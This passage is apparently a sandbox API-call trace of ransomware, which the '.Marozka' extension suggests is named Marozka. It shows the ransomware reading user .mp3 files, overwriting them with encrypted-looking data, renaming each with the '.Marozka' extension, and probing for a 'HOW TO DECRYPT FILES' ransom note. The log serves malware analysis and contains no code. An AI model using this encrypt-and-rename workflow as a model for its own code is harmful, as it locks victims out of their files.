lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\cfOn4.mp3", nBufferLength=0x105, lpBuffer=0x5be360, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\cfOn4.mp3", lpFilePart=0x0) returned 0x41 [0057.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be8a4) returned 1 [0057.715] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\cfOn4.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\nsmyppyczft6c7\\7ow2ohsjqy\\cfon4.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0057.716] GetFileType (hFile=0x2e0) returned 0x1 [0057.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be8a0) returned 1 [0057.716] GetFileType (hFile=0x2e0) returned 0x1 [0057.716] WriteFile (in: hFile=0x2e0, lpBuffer=0x287b958*, nNumberOfBytesToWrite=0x10970, lpNumberOfBytesWritten=0x5be954, lpOverlapped=0x0 | out: lpBuffer=0x287b958*, lpNumberOfBytesWritten=0x5be954*=0x10970, lpOverlapped=0x0) returned 1 [0057.718] CloseHandle (hObject=0x2e0) returned 1 [0057.719] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\cfOn4.mp3", nBufferLength=0x105, lpBuffer=0x5be484, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\cfOn4.mp3", lpFilePart=0x0) returned 0x41 [0057.719] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\cfOn4.mp3.Marozka", nBufferLength=0x105, lpBuffer=0x5be484, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\cfOn4.mp3.Marozka", lpFilePart=0x0) returned 0x49 [0057.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be938) returned 1 [0057.720] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\cfOn4.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\nsmyppyczft6c7\\7ow2ohsjqy\\cfon4.mp3"), fInfoLevelId=0x0, lpFileInformation=0x5be9b4 | out: lpFileInformation=0x5be9b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea2cb960, ftCreationTime.dwHighDateTime=0x1d4cf06, ftLastAccessTime.dwLowDateTime=0x30d990c0, ftLastAccessTime.dwHighDateTime=0x1d4c7c0, ftLastWriteTime.dwLowDateTime=0xe52118ac, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x10970)) returned 1 [0057.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be934) returned 1 [0057.720] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\cfOn4.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\nsmyppyczft6c7\\7ow2ohsjqy\\cfon4.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\cfOn4.mp3.Marozka" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\nsmyppyczft6c7\\7ow2ohsjqy\\cfon4.mp3.marozka")) returned 1 [0057.720] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\fv_r.mp3", nBufferLength=0x105, lpBuffer=0x5be374, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\fv_r.mp3", lpFilePart=0x0) returned 0x40 [0057.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be8b8) returned 1 [0057.721] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\fv_r.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\nsmyppyczft6c7\\7ow2ohsjqy\\fv_r.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0057.721] GetFileType (hFile=0x2e0) returned 0x1 [0057.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be8b4) returned 1 [0057.721] GetFileType (hFile=0x2e0) returned 0x1 [0057.721] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5be9b4 | out: lpFileSizeHigh=0x5be9b4*=0x0) returned 0x41b8 [0057.721] ReadFile (in: hFile=0x2e0, lpBuffer=0x288c84c, nNumberOfBytesToRead=0x41b8, lpNumberOfBytesRead=0x5be960, lpOverlapped=0x0 | out: lpBuffer=0x288c84c*, lpNumberOfBytesRead=0x5be960*=0x41b8, lpOverlapped=0x0) returned 1 [0057.721] CloseHandle (hObject=0x2e0) returned 1 [0057.856] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0057.856] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0057.856] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5be9a8 | out: lpFileInformation=0x5be9a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.856] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0057.856] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\fv_r.mp3", nBufferLength=0x105, lpBuffer=0x5be360, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\fv_r.mp3", lpFilePart=0x0) returned 0x40 [0057.856] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be8a4) returned 1 [0057.856] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\fv_r.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\nsmyppyczft6c7\\7ow2ohsjqy\\fv_r.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0057.857] GetFileType (hFile=0x2e0) returned 0x1 [0057.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be8a0) returned 1 [0057.857] GetFileType (hFile=0x2e0) returned 0x1 [0057.857] WriteFile (in: hFile=0x2e0, lpBuffer=0x267b360*, nNumberOfBytesToWrite=0x41c0, lpNumberOfBytesWritten=0x5be954, lpOverlapped=0x0 | out: lpBuffer=0x267b360*, lpNumberOfBytesWritten=0x5be954*=0x41c0, lpOverlapped=0x0) returned 1 [0057.858] CloseHandle (hObject=0x2e0) returned 1 [0057.859] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\fv_r.mp3", nBufferLength=0x105, lpBuffer=0x5be484, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\fv_r.mp3", lpFilePart=0x0) returned 0x40 [0057.859] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\fv_r.mp3.Marozka", nBufferLength=0x105, lpBuffer=0x5be484, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\fv_r.mp3.Marozka", lpFilePart=0x0) returned 0x48 [0057.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be938) returned 1 [0057.859] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\fv_r.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\nsmyppyczft6c7\\7ow2ohsjqy\\fv_r.mp3"), fInfoLevelId=0x0, lpFileInformation=0x5be9b4 | out: lpFileInformation=0x5be9b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x490e0bd0, ftCreationTime.dwHighDateTime=0x1d4c9c3, ftLastAccessTime.dwLowDateTime=0x4c7d9e70, ftLastAccessTime.dwHighDateTime=0x1d4c973, ftLastWriteTime.dwLowDateTime=0xe5369088, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x41c0)) returned 1 [0057.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be934) returned 1 [0057.860] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\fv_r.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\nsmyppyczft6c7\\7ow2ohsjqy\\fv_r.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\fv_r.mp3.Marozka" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\nsmyppyczft6c7\\7ow2ohsjqy\\fv_r.mp3.marozka")) returned 1 [0057.860] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\OJT62b a.mp3", nBufferLength=0x105, lpBuffer=0x5be374, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\OJT62b a.mp3", lpFilePart=0x0) returned 0x44 [0057.860] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be8b8) returned 1 [0057.860] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\OJT62b a.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\nsmyppyczft6c7\\7ow2ohsjqy\\ojt62b a.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0057.860] GetFileType (hFile=0x2e0) returned 0x1 [0057.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be8b4) returned 1 [0057.894] GetFileType (hFile=0x2e0) returned 0x1 [0057.894] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5be9b4 | out: lpFileSizeHigh=0x5be9b4*=0x0) returned 0x167a6 [0057.894] ReadFile (in: hFile=0x2e0, lpBuffer=0x3951f10, nNumberOfBytesToRead=0x167a6, lpNumberOfBytesRead=0x5be960, lpOverlapped=0x0 | out: lpBuffer=0x3951f10*, lpNumberOfBytesRead=0x5be960*=0x167a6, lpOverlapped=0x0) returned 1 [0057.895] CloseHandle (hObject=0x2e0) returned 1 [0057.920] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0057.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0057.920] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5be9a8 | out: lpFileInformation=0x5be9a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0057.921] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\OJT62b a.mp3", nBufferLength=0x105, lpBuffer=0x5be360, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\OJT62b a.mp3", lpFilePart=0x0) returned 0x44 [0057.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be8a4) returned 1 [0057.921] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\OJT62b a.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\nsmyppyczft6c7\\7ow2ohsjqy\\ojt62b a.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0057.922] GetFileType (hFile=0x2e0) returned 0x1 [0057.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be8a0) returned 1 [0057.923] GetFileType (hFile=0x2e0) returned 0x1 [0057.923] WriteFile (in: hFile=0x2e0, lpBuffer=0x3685188*, nNumberOfBytesToWrite=0x167b0, lpNumberOfBytesWritten=0x5be954, lpOverlapped=0x0 | out: lpBuffer=0x3685188*, lpNumberOfBytesWritten=0x5be954*=0x167b0, lpOverlapped=0x0) returned 1 [0057.928] CloseHandle (hObject=0x2e0) returned 1 [0057.930] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\OJT62b a.mp3", nBufferLength=0x105, lpBuffer=0x5be484, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\OJT62b a.mp3", lpFilePart=0x0) returned 0x44 [0057.930] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\OJT62b a.mp3.Marozka", nBufferLength=0x105, lpBuffer=0x5be484, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\OJT62b a.mp3.Marozka", lpFilePart=0x0) returned 0x4c [0057.931] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be938) returned 1 [0057.931] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\OJT62b a.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\nsmyppyczft6c7\\7ow2ohsjqy\\ojt62b a.mp3"), fInfoLevelId=0x0, lpFileInformation=0x5be9b4 | out: lpFileInformation=0x5be9b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4da8c40, ftCreationTime.dwHighDateTime=0x1d4c7a9, ftLastAccessTime.dwLowDateTime=0x20185870, ftLastAccessTime.dwHighDateTime=0x1d4d1b1, ftLastWriteTime.dwLowDateTime=0xe5427983, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x167b0)) returned 1 [0057.931] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be934) returned 1 [0057.931] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\OJT62b a.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\nsmyppyczft6c7\\7ow2ohsjqy\\ojt62b a.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\OJT62b a.mp3.Marozka" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\nsmyppyczft6c7\\7ow2ohsjqy\\ojt62b a.mp3.marozka")) returned 1 [0057.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea0c) returned 1 [0057.932] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\m3pvm2EQS-SxL", nBufferLength=0x105, lpBuffer=0x5be4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\m3pvm2EQS-SxL", lpFilePart=0x0) returned 0x3a [0057.932] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\m3pvm2EQS-SxL\\*", lpFindFileData=0x5be734 | out: lpFindFileData=0x5be734) returned 0xa7d908 [0057.932] FindNextFileW (in: hFindFile=0xa7d908, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.932] FindNextFileW (in: hFindFile=0xa7d908, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 0 [0057.932] FindClose (in: hFindFile=0xa7d908 | out: hFindFile=0xa7d908) returned 1 [0057.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9c8) returned 1 [0057.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9d4) returned 1 [0057.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea0c) returned 1 [0057.933] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\m3pvm2EQS-SxL", nBufferLength=0x105, lpBuffer=0x5be4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\m3pvm2EQS-SxL", lpFilePart=0x0) returned 0x3a [0057.933] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\m3pvm2EQS-SxL\\*", lpFindFileData=0x5be734 | out: lpFindFileData=0x5be734) returned 0xa7d908 [0057.933] FindNextFileW (in: hFindFile=0xa7d908, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.933] FindNextFileW (in: hFindFile=0xa7d908, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 0 [0057.933] FindClose (in: hFindFile=0xa7d908 | out: hFindFile=0xa7d908) returned 1 [0057.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9c8) returned 1 [0057.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9d4) returned 1 [0057.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea0c) returned 1 [0057.934] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\ZN0lb923EkVMtcMKie1", nBufferLength=0x105, lpBuffer=0x5be4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\ZN0lb923EkVMtcMKie1", lpFilePart=0x0) returned 0x40 [0057.934] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\ZN0lb923EkVMtcMKie1\\*", lpFindFileData=0x5be734 | out: lpFindFileData=0x5be734) returned 0xa7dc08 [0057.934] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.934] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.934] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.934] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.935] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 0 [0057.935] FindClose (in: hFindFile=0xa7dc08 | out: hFindFile=0xa7dc08) returned 1 [0057.935] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9c8) returned 1 [0057.935] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9d4) returned 1 [0057.935] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea0c) returned 1 [0057.935] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\ZN0lb923EkVMtcMKie1", nBufferLength=0x105, lpBuffer=0x5be4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\ZN0lb923EkVMtcMKie1", lpFilePart=0x0) returned 0x40 [0057.935] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\ZN0lb923EkVMtcMKie1\\*", lpFindFileData=0x5be734 | out: lpFindFileData=0x5be734) returned 0xa7d908 [0057.935] FindNextFileW (in: hFindFile=0xa7d908, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.935] FindNextFileW (in: hFindFile=0xa7d908, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.936] FindNextFileW (in: hFindFile=0xa7d908, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.936] FindNextFileW (in: hFindFile=0xa7d908, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.936] FindNextFileW (in: hFindFile=0xa7d908, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 0 [0057.936] FindClose (in: hFindFile=0xa7d908 | out: hFindFile=0xa7d908) returned 1 [0057.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9c8) returned 1 [0057.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9d4) returned 1 [0057.936] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\ZN0lb923EkVMtcMKie1\\yU5tCrdB5.mp3", nBufferLength=0x105, lpBuffer=0x5be374, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\ZN0lb923EkVMtcMKie1\\yU5tCrdB5.mp3", lpFilePart=0x0) returned 0x4e [0057.937] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be8b8) returned 1 [0057.937] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\ZN0lb923EkVMtcMKie1\\yU5tCrdB5.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\nsmyppyczft6c7\\zn0lb923ekvmtcmkie1\\yu5tcrdb5.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0057.937] GetFileType (hFile=0x2e0) returned 0x1 [0057.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be8b4) returned 1 [0057.937] GetFileType (hFile=0x2e0) returned 0x1 [0057.937] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5be9b4 | out: lpFileSizeHigh=0x5be9b4*=0x0) returned 0x18f37 [0057.937] ReadFile (in: hFile=0x2e0, lpBuffer=0x369b958, nNumberOfBytesToRead=0x18f37, lpNumberOfBytesRead=0x5be960, lpOverlapped=0x0 | out: lpBuffer=0x369b958*, lpNumberOfBytesRead=0x5be960*=0x18f37, lpOverlapped=0x0) returned 1 [0057.937] CloseHandle (hObject=0x2e0) returned 1 [0058.001] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0058.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0058.001] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5be9a8 | out: lpFileInformation=0x5be9a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0058.001] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0058.001] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\ZN0lb923EkVMtcMKie1\\yU5tCrdB5.mp3", nBufferLength=0x105, lpBuffer=0x5be360, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\ZN0lb923EkVMtcMKie1\\yU5tCrdB5.mp3", lpFilePart=0x0) returned 0x4e [0058.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be8a4) returned 1 [0058.001] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\ZN0lb923EkVMtcMKie1\\yU5tCrdB5.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\nsmyppyczft6c7\\zn0lb923ekvmtcmkie1\\yu5tcrdb5.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0058.003] GetFileType (hFile=0x2e0) returned 0x1 [0058.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be8a0) returned 1 [0058.003] GetFileType (hFile=0x2e0) returned 0x1 [0058.003] WriteFile (in: hFile=0x2e0, lpBuffer=0x37185d0*, nNumberOfBytesToWrite=0x18f40, lpNumberOfBytesWritten=0x5be954, lpOverlapped=0x0 | out: lpBuffer=0x37185d0*, lpNumberOfBytesWritten=0x5be954*=0x18f40, lpOverlapped=0x0) returned 1 [0058.006] CloseHandle (hObject=0x2e0) returned 1 [0058.009] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\ZN0lb923EkVMtcMKie1\\yU5tCrdB5.mp3", nBufferLength=0x105, lpBuffer=0x5be484, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\ZN0lb923EkVMtcMKie1\\yU5tCrdB5.mp3", lpFilePart=0x0) returned 0x4e [0058.009] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\ZN0lb923EkVMtcMKie1\\yU5tCrdB5.mp3.Marozka", nBufferLength=0x105, lpBuffer=0x5be484, lpFilePart=0x0 | out: 